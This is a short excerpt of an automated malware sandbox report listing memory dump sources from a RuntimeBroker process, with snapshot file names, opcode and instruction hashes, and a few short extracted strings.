                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e864652300de8a606cf3d5965fc07d723ba137fc0988361cd5264102c2a6e98d
                                                                                                    • Instruction ID: 3e97a83bda5f457f100fcfba8b79c93e8ac96d357fa61eecf91f84aff9641c7f
                                                                                                    • Opcode Fuzzy Hash: e864652300de8a606cf3d5965fc07d723ba137fc0988361cd5264102c2a6e98d
                                                                                                    • Instruction Fuzzy Hash: CD21A770D4966D8ADBB4DB54C8A83ECB6B1EB94301F4142E9D00DA62A1CFB86AC4DF00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                    • API String ID: 0-1692736845
                                                                                                    • Opcode ID: 7f71ed8f09d2a040804166f249e54281840e3c12423b0281bb22292a543f27f3
                                                                                                    • Instruction ID: 1cfaf543efabeea70f5d479527ae80e3e62a6043bd93ec1be23cd1b6263c3ac6
                                                                                                    • Opcode Fuzzy Hash: 7f71ed8f09d2a040804166f249e54281840e3c12423b0281bb22292a543f27f3
                                                                                                    • Instruction Fuzzy Hash: 1341BD02B0946705E23AB3FC78229F96B449FA937FB4843B7F45E8D0EB4D096085C2D5